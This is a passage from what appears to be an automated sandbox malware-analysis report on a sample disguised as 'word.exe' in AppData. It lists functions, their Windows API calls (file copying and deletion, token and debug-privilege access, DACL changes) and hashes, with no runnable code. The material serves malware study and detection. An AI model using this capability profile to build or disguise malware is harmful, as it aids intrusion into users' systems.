                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 2173856841-1027155976
                                                                            • Opcode ID: 794e07af1c9c1cb68973c2f94f3b6c607b21d5fd27dbfc7dd882fd35dae7c352
                                                                            • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                            • Opcode Fuzzy Hash: 794e07af1c9c1cb68973c2f94f3b6c607b21d5fd27dbfc7dd882fd35dae7c352
                                                                            • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                            Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                              • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                            • _wcscat.LIBCMT ref: 0044BD96
                                                                            • _wcscat.LIBCMT ref: 0044BDBF
                                                                            • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                            • _wcscpy.LIBCMT ref: 0044BE73
                                                                            • _wcscat.LIBCMT ref: 0044BE85
                                                                            • _wcscat.LIBCMT ref: 0044BE97
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                            • MoveFileW.KERNEL32 ref: 0044BEF5
                                                                            • CopyFileW.KERNEL32 ref: 0044BF0C
                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                            • CopyFileW.KERNEL32 ref: 0044BF2E
                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                            • MoveFileW.KERNEL32 ref: 0044BF51
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 2188072990-1173974218
                                                                            • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                            • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                            • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                            • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                            Function 0042039F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 282timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __invoke_watson.LIBCMT ref: 004203A4
                                                                              • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                              • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                              • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32 ref: 00417E79
                                                                              • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?), ref: 00417E86
                                                                              • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                              • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                            • __get_daylight.LIBCMT ref: 004203B0
                                                                            • __invoke_watson.LIBCMT ref: 004203BF
                                                                            • __get_daylight.LIBCMT ref: 004203CB
                                                                            • __invoke_watson.LIBCMT ref: 004203DA
                                                                            • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                            • _strlen.LIBCMT ref: 00420442
                                                                            • __malloc_crt.LIBCMT ref: 00420449
                                                                            • _strlen.LIBCMT ref: 0042045F
                                                                            • _strcpy_s.LIBCMT ref: 0042046D
                                                                            • __invoke_watson.LIBCMT ref: 00420482
                                                                            • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                            • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                            • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                              • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                              • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                              • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                              • Part of subcall function 00413A88: HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
                                                                              • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                            • __invoke_watson.LIBCMT ref: 004205CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                            • String ID: S\
                                                                            • API String ID: 4084823496-393906132
                                                                            • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                            • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                            • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                            • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                            Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                            • __swprintf.LIBCMT ref: 00434D91
                                                                            • _wcslen.LIBCMT ref: 00434D9B
                                                                            • _wcslen.LIBCMT ref: 00434DB0
                                                                            • _wcslen.LIBCMT ref: 00434DC5
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                            • _memset.LIBCMT ref: 00434E27
                                                                            • _wcslen.LIBCMT ref: 00434E3C
                                                                            • _wcsncpy.LIBCMT ref: 00434E6F
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 302090198-3457252023
                                                                            • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                            • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                            • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                            • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                            Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                            • GetLastError.KERNEL32 ref: 004644B4
                                                                            • GetCurrentThread.KERNEL32(00000028,00000000,?), ref: 004644C8
                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 1312810259-2896544425
                                                                            • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                            • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                            • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                            • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                            Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                            • __wsplitpath.LIBCMT ref: 004038B2
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcscpy.LIBCMT ref: 004038C7
                                                                            • _wcscat.LIBCMT ref: 004038DC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                            • _wcscpy.LIBCMT ref: 004039C2
                                                                            • _wcslen.LIBCMT ref: 00403A53
                                                                            • _wcslen.LIBCMT ref: 00403AAA
                                                                            Strings
                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                            • Error opening the file, xrefs: 0042B8AC
                                                                            • Unterminated string, xrefs: 0042B9BA
                                                                            • _, xrefs: 00403B48
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                            • API String ID: 4115725249-188983378
                                                                            • Opcode ID: 5c8ff5aa4497b4a6ae766a1db4d44c20e2a53d79bbd935119ae11a08b50845da
                                                                            • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                            • Opcode Fuzzy Hash: 5c8ff5aa4497b4a6ae766a1db4d44c20e2a53d79bbd935119ae11a08b50845da
                                                                            • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                            Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                            • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                            • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                            • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                            • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                            • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                            • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                            • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                            Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Timetime$Sleep
                                                                            • String ID: BUTTON
                                                                            • API String ID: 4176159691-3405671355
                                                                            • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                            • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                            • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                            • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                            Function 00442E1F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 134fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,75701228,75701228,?,?,00000000), ref: 00442E40
                                                                            • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                            • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                              • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                                                                            • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                            • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                            • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                            • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                            Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                              • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                              • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                            • _memset.LIBCMT ref: 00445E61
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                            • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                            • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                            • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                            • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3490752873-0
                                                                            • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                            • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                            • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                            • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                            Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                            • _memset.LIBCMT ref: 0047AB7C
                                                                            • _wcslen.LIBCMT ref: 0047AC68
                                                                            • _memset.LIBCMT ref: 0047ACCD
                                                                            • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                            • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 0047AD84
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1588287285-2785691316
                                                                            • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                            • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                            • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                            • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                            Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
